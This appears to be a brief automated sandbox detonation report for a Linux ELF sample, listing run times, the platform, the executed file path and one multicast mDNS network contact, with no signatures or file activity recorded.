Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf]

Signatures

N/A

Processes

/tmp/68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf

[/tmp/68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A